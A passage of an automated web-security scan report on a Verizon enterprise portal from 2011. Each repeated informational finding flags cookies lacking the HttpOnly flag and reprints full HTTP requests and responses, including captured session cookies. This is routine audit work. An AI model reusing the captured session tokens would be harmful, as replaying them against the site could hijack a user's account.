GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 117
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "75-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


10.47. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "69-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7144
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


10.48. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 607
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "25f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

...[SNIP]...

10.49. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 248
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "f8-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7188
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a.......................................................zzz......[[[...###............@@@...............!.......,..........u.&n@i..XFM.F.J.t]S().|/..L".....D..hJ..E% i*J.,....0ZD.@&..er..>@.oH.Pb
...[SNIP]...

10.50. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7156
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a
....,..\\....II.UU................bb..........OO.kk.WW.gg....88.kk....jj.gg.==.dd....kk.bb.YY.\\.ii.__.ZZ.hh.ee.ff.^^.XX....gg.[[.cc.``.]].......................................................
...[SNIP]...

10.51. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 810
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "32a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a,.......\\....II.UU................bb..........OO.kk.WW.gg....88.kk....jj.gg.==.dd....kk.bb.YY.\\.ii.__.ZZ.hh.ee.ff.^^.XX....gg.[[.cc.``.]].......................................................
...[SNIP]...

10.52. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 330
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7161
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a
....(.......000$$$yyy]]]


eee...<<<......ppp...***666.........YYYQQQ......vvv.........zzzdddrrr^^^```...nnn[[[ggg...~~~RRRkkk...................................................................
...[SNIP]...

10.53. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 805
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "325-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a,............000$$$yyy]]]


eee...<<<......ppp...***666.........YYYQQQ......vvv.........zzzdddrrr^^^```...nnn[[[ggg...~~~RRRkkk...................................................................
...[SNIP]...

10.54. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 219
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "db-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a...............................---.........222...UTT...///BBB...999....................................!.......,..........X.u.di....l...8.t].B..;....c..D~.Rc). ...d. %.....x`.$.XA.<-...dh.+.G..&
...[SNIP]...

10.55. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; 